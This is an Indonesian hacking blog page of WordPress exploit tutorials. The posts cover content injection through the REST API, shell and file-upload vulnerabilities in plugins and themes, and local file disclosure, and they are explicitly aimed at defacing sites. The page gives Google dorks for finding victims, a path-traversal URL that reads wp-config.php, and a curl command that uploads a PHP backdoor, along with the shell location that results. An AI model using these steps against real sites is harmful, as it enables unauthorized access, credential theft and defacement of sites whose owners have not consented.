LinuxSec Exploit

Nothing is Ever Locked

WordPress Exploit

WordPress 4.7.0/4.7.1 Content Injection Exploit

by Jack Wilder 4 Comments

Celah ini menginfeksi  WordPress REST API yang ditambahkan secara default pada WordPress 4.7.0. Salahsatu API tersebut memungkinkan kita mengupdate menghapus mengedit dan menambahkan konten di WordPress. Sayangnya fitur ini malah memiliki celah yangmana pengunjung situs yang bukan admin pun dapat mengupdate konten website melalui API tersebut.

Untuk detail lebih jauh cek di
https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
Exploit :
WordPress 4.7.0/4.7.1 – Unauthenticated Content Injection (Ruby)
Edit seperlunya di bagian Title dan Post
Jika error pas run ruby, install rest-client dulu.
sudo gem install rest-client
Lalu jalankan lagi exploit nya.

Exploit WordPress Ajax Load More PHP Upload Vulnerability

by Jack Wilder Leave a Comment

Yooshh.. jumpa lagi kali ini saya akan share tutorial Wordpress Ajax Load More PHP Upload Vulnerability. Exploit ini membutuhkan metasploit. Jadi yang belum install , bisa install dulu. Exploit source nya dari Exploit-DB .

Langsung saja ke tutorial.

Download Exploit nya disini : https://www.exploit-db.com/exploits/38660/
Tambahkan module diatas ke metasploit kalian . Jika masih ada yang bingung bisa lihat di artikel ini :
Ada opsi berikut di Exploit nya :
  • RHOST : isi dengan host dari target kalian.
  • TARGETURI : isi dengan path dimana wordpress berada. contoh /blog , /wordpress, atau bisa juga di root path nya .
  • WP_USERNAME : isi dengan username wordpress nya.
  • WP_PASSWORD : isi dengan password wordpress nya.
Untuk lebih jelasnya bisa lihat video nya di link berikut :

WordPress Ajax Load More PHP Upload Vulnerability

Lalu bagaimana cara patch nya ?
Upgrade plugins kalian ke versi terbaru. Karena exploit ini hanya bisa sampai di versi 2.8.1.1

Sekian tutorial kali ini dan happy exploiting.

Deface WordPress dengan Exploit Themes Qualifire File Upload Vulnerability

by Jack Wilder 1 Comment

Yuppp.. lama ya tidak share exploit deface. Kali ini saya mau share tutorial deface WordPress dengan Exploit Themes Qualifire File Upload Vulnerability . Exploit nya sudah lama sih sebenarnya, namun gak tau kenapa sekarang “bersemi kembali” . [Read more…] about Deface WordPress dengan Exploit Themes Qualifire File Upload Vulnerability

Deface WordPress dengan Exploit WordPress Plugins WPShop File Upload Vulnerability

by Jack Wilder Leave a Comment

Mau share aja exploit yang ditemukan oleh saya dan teman saya dari Indonesian Cyber Army, Mr.Xenophobic. Nama nya Exploit WordPress Plugins WPShop File Upload Vulnerability. Fuck 1337day.com for reject this exploit =)) [Read more…] about Deface WordPress dengan Exploit WordPress Plugins WPShop File Upload Vulnerability

Exploit WordPress Plugin WP Mobile Edition Local File Disclosure Vulnerability

by Jack Wilder Leave a Comment

Yupp, kali ini mau share lagi exploit pada WordPress yang memiliki celah pada plugins WP Mobile Edition.
Plugin ‘WP Mobile Edition’ ini tidak memfilter parameter GET file di /themes/mTheme-Unus/css/css.php . Alhasil kita juga dapat melihat source dari konfigurasi WordPress yang terletak di wp-config.php .
Oke langsung saja.
Google Dorks :
inurl:?fdx_switcher=mobile
Exploit :
127.0.0.1/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php

Tested on : BackBox Linux

Sekian tutor kali ini semoga bermanfaat.

Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

by Jack Wilder 1 Comment

Oke lama ya tidak membahas exploit web . Hehehe. barusan buka 1337day dan kebetulan ada exploit yang baru dirilis. Nama nya Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability . Langsung saja ke tutorial ya :
Google Dorks :
intitle: index of /uploads/contact_files/
– use your brain, bitch !

Shell location :
http://victim/wp-content/uploads/contact_files/backdoor.php
Tested on :
BackBox Linux

Anggap sudah meneumuakn target.
Sekarang masuk terminal linux.
[email protected] ~ % mkdir exp
[email protected] ~ % cd exp

Kita membuat folder exp dan masuk ke direktori tersebut .
Lalu kita masukkan backdoor kita disitu.
Misalkan saya membuat backdoor x.php di folder exp tadi.
Lalu masukkan command berikut :
curl -k -X POST -F “action=upload” -F “[email protected]/[backdoor.php]” -F “action=nm_webcontact_upload_file” http://target/wp-admin/admin-ajax.php
Contoh :
Disana tertulis :
{“status”:”uploaded”,”filename”:”1428981565-x.php“}%
Maka shell akan berada di :
http://localhost/bugs/wp-content/uploads/contact_files/1428981565-x.php

Sekian dan semoga bermanfaat .
Happy exploiting 🙂

Powered by WordPress and Genesis Framework. Style by LinuxSec.